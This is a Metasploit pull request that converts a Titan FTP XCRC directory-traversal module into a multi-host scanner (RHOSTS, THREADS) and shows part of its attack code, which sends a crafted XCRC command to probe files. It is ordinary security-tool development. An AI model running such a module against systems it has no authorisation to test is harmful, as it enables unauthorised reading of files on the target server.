### PR TITLE
modified titanftp_xcrc_traversal to allow RHOSTS

### DIFF
--- a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb
+++ b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Auxiliary
 
 	include Msf::Exploit::Remote::Ftp
 	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::Scanner
 
 	def proto
 		'ftp'
@@ -28,7 +29,11 @@ class Metasploit3 < Msf::Auxiliary
 				Although the daemon runs with SYSTEM privileges, access is limited to files
 				that reside on the same drive as the FTP server's root directory.
 			},
-			'Author'         => 'jduck',
+			'Author'         =>
+				[
+					'jduck',
+					'Brandon McCann @zeknox <bmccann[at]accuvant.com>',
+				],
 			'License'        => MSF_LICENSE,
 			'References'     =>
 				[
@@ -47,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 
-	def run
+	def run_host(ip)
 
 		connect_login
 
@@ -55,7 +60,8 @@ class Metasploit3 < Msf::Auxiliary
 
 		res = send_cmd( ['XCRC', path, "0", "9999999999"], true )
 		if not (res =~ /501 Syntax error in parameters or arguments\. EndPos of 9999999999 is larger than file size (.*)\./)
-			raise RuntimeError, "Unable to obtain file size! File probably doesn't exist."
+			print_error("Unable to obtain file size! File probably doesn't exist.")
+			return
 		end
 		file_size = $1.to_i
 


### PR DESCRIPTION
This pull request will allow for RHOSTS and THREADS as requested in redmine here:
http://dev.metasploit.com/redmine/issues/7719

Original Pull Request:  https://github.com/rapid7/metasploit-framework/pull/1377

The module has not been moved to the auxiliary/scanner/ftp directory since it is now a scanner module.
